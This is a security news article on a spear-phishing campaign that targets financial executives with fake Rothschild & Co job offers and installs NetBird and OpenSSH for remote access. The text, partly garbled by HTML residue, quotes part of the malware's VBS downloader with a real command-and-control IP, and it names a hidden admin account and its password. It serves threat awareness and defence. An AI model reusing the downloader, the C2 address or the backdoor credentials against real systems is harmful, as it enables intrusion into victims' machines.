A sophisticated spear-phishing campaign has emerged targeting chief financial officers and senior financial executives across banking, energy, insurance, and investment sectors worldwide, marking a concerning escalation in precision-targeted cyber attacks against corporate leadership.<\/p>\n
The campaign, which surfaced on May 15, 2025, employs advanced social engineering techniques disguised as legitimate recruitment opportunities from prestigious financial firm Rothschild & Co to compromise high-value targets across Europe, Africa, Canada, the Middle East, and South Asia.<\/p>\n
This multi-stage operation through their email security products, which flagged the suspicious campaign due to unusual CAPTCHA<\/a> behavior patterns and evasive URL structures.<\/p>\n The attackers demonstrate sophisticated understanding of corporate hierarchies and executive psychology, crafting personalized messages that appeal to career advancement aspirations while bypassing traditional security awareness training focused on generic phishing attempts.<\/p>\n The attack represents a significant departure from conventional malware deployment strategies, as threat actors leverage NetBird, a legitimate WireGuard-based remote access tool, rather than traditional backdoors or trojans.<\/p>\n This approach allows attackers to blend malicious activities with legitimate network management tools, complicating detection efforts and extending persistence capabilities.<\/p>\n Trellix researchers noted<\/a> that portions of the infrastructure overlap with at least one other nation-state spear-phishing campaign, though definitive attribution remains pending further investigation.<\/p>\n The campaign\u2019s global reach spans multiple industries and geographic regions, with confirmed targeting of financial institutions in the United Kingdom, Canada, South Africa, Norway, South Korea, Singapore, Switzerland, France, Egypt, Saudi Arabia, and Brazil.<\/p>\n The precision targeting suggests extensive reconnaissance<\/a> capabilities and access to detailed corporate organizational charts, indicating a well-resourced threat actor with strategic objectives beyond immediate financial gain.<\/p>\n The attack chain initiates with carefully crafted emails bearing the subject line \u201cRothschild & Co leadership opportunity (Confidential)\u201d sent from the address _863563754768397286998728@notarius.net.<\/p>\n Recipients receive what appears to be a PDF attachment named \u201cRothschild_&_Co-6745763.PDF,\u201d which actually functions as a phishing link redirecting victims to a Firebase-hosted application at hxxps:\/\/googl-6c11f.firebaseapp[.]com\/job\/file-846873865383.html.<\/p>\n The intermediate page implements a custom CAPTCHA mechanism requiring users to solve simple mathematical calculations, specifically asking \u201cWhat is the result of 9 + 10?\u201d This evasion technique circumvents automated security scanners<\/a> while creating a false sense of legitimacy through the mathematical verification process.<\/p>\n Upon successful completion, JavaScript functions decrypt a hardcoded redirect URL, leading victims to hxxps:\/\/googl-6c11f.web[.]app\/job\/9867648797586_Scan_15052025-736574.html, where they encounter a download portal mimicking secure document delivery systems.<\/p>\n The downloaded archive \u201cRothschild_&_Co-6745763.zip\u201d contains an initial VBS script that establishes the infection foothold. This 1KB file performs several critical functions upon execution:-<\/p>\n The script establishes a temporary directory structure, downloads a secondary payload disguised as a PDF file, and executes it with elevated privileges using the \u201crunas\u201d flag.<\/p>\n This second-stage VBS downloader retrieves additional components from the same command and control server, including NetBird and OpenSSH MSI packages concealed within a renamed ZIP archive.<\/p>\n The installation process occurs silently through msiexec commands, while the script simultaneously creates a hidden administrative account named \u201cuser\u201d with the password \u201cBs@202122\u201d and enables Remote Desktop Protocol access, providing attackers with multiple persistent access vectors to compromised systems.<\/p>\n Try in-depth sandbox malware analysis for\u00a0your SOC tea<\/strong>m. Get\u00a0ANY.RUN special offer only\u00a0until May 31<\/strong>\u00a0->\u00a0Try Here<\/a><\/strong><\/p>\n The post New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nInfection Mechanism and Multi-Stage Payload Delivery<\/strong><\/h2>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgBdYxIahB3ujoG36IrMmQXC527FQMj7mYENmcM1Q2BBFkiKWTQoDC-1um8pYy6RE5lDczB7788O1ByjsziOvIdk_ftkm0F0qeOvhJT1lk63HofmcAV0bwtYF5L3i1V5GMcG9UajHKL26Do-CMPsQox_0OUVw-_T6ep-nRXrqS4k-L0CAqW-VKqoQQl-Yk\/s16000\/Spear-Phishing%2520Campaign%2520Installing%2520Netbird%2520and%2520Enabling%2520Remote%2520Access%2520%28Source%2520-%2520Trellix%29.webp?ssl=1\")
scriptURL = \"http:\/\/192.3.95.152\/cloudshare\/atr\/pull.pdf\"\nsavePath = \"C:temperpull.vbs\"\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\nIf Not objFSO.FolderExists(\"C:temper\") Then\n objFSO.CreateFolder \"C:temper\"\nEnd If<\/code><\/pre>\n